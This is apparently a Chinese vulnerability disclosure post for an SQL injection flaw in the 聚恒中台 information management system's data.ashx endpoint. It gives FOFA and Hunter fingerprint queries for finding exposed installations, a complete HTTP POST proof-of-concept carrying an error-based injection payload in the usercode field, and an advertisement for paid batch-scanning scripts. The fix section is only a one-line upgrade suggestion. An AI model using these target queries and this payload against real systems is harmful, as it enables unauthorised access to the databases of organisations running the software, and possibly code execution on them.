0x01 免责声明
文章内容仅供日常学习使用,请勿非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。如有内容争议或侵权,我们会及时删除。
0x02 漏洞描述
聚恒中台是山东聚恒网络技术有限公司打造的一体化、数字化、精细化、智能化的信息管理系统。
聚恒中台data.ashx 文件存在SQL注入漏洞、可以rce 。
0x03 测绘查询-系统指纹
fofa:body="sysplat/dataget/data.ashx?type=sendvalidatecode"
鹰图:web.icon=="b4a324f47f54b46cb38c016814c975e0"
0x04 漏洞复现
1、访问漏洞系统
2、发送POST包,发现聚恒中台系统存在SQL注入
3、漏洞利用POC
POST /sysplat/dataget/data.ashx?type=sendvalidatecode HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 57
usercode=1' and 1=(convert(int,@@version))--&&mobile=
0x05 Nuclei POC 批量验证脚本
加入帮会获取批量验证脚本,帮会每天更新漏洞nday、1day漏洞poc
扫描也可加入:
0x06 漏洞修复建议
系统已发布漏洞修复版本,建议升级到最新版本: